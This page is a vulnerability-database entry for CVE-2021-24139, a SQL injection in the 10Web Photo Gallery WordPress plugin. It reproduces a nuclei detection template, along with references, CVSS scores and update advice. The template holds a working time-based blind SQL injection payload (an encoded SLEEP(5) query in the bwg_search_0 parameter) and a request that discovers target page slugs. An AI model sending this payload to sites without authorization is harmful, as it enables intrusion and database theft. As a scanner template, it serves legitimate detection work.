Lucene search
K

10Web Photo Gallery < 1.5.55 - SQL Injection

🗓️ 11 Jul 2026 02:59:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

SQL injection in 10Web Photo Gallery pre-1.5.55 via unvalidated bwg_search_x parameter; update to 1.5.55+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24139
18 Mar 202117:32
circl
CNNVD
Wordpress Photo Gallery SQL注入漏洞
18 Mar 202100:00
cnnvd
CVE
CVE-2021-24139
18 Mar 202114:57
cve
Cvelist
CVE-2021-24139 Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection
18 Mar 202114:57
cvelist
EUVD
EUVD-2021-11053
7 Oct 202500:30
euvd
NVD
CVE-2021-24139
18 Mar 202115:15
nvd
OpenVAS
WordPress Photo Gallery Plugin < 1.5.55 SQLi Vulnerability
24 Mar 202100:00
openvas
OSV
CVE-2021-24139
18 Mar 202115:15
osv
Prion
Sql injection
18 Mar 202115:15
prion
Positive Technologies
PT-2021-15684
18 Mar 202100:00
ptsecurity
Rows per page
id: CVE-2021-24139

info:
  name: 10Web Photo Gallery < 1.5.55 - SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    WordPress plugin 10Web Photo Gallery versions before 1.5.55 contains a SQL injection caused by unvalidated input in the 'bwg_search_x' parameter in frontend/models/model.php, letting attackers execute arbitrary SQL commands, exploit requires attacker to control the 'bwg_search_x' parameter.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  remediation: |
    Update to version 1.5.55 or later.
  reference:
    - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24139
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24139
    cwe-id: CWE-89
    epss-score: 0.05418
    epss-percentile: 0.91754
    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 10web
    product: photo_gallery
    publicwww-query: "bwg_container"
  tags: cve,cve2021,wp,wp-plugin,sqli,photo-gallery,10web,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php?rest_route=/wp/v2/pages HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: slug
        group: 1
        regex:
          - '"slug"\s*:\s*"([^"]+)"[\s\S]*?"content"\s*:\s*{\s*"rendered"\s*:\s*".*?bwg'
        internal: true

  - raw:
      - |
        @timeout: 50s
        GET /{{slug}}/?bwg_search_0=%22%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F4846%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29UIHp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%22zQgg%22%2F%2A%2A%2FLIKE%2F%2A%2A%2F%22zQgg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code==200'
# digest: 4a0a00473045022100ad0bbcee887c4ab0195b50187ec0e0b1753b227b87ec9ba0eebe517b0e4383e40220144c6a294b5ea0ab96c5856422208b8b4458abb869f55af633f537e4c393de7e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.05418
15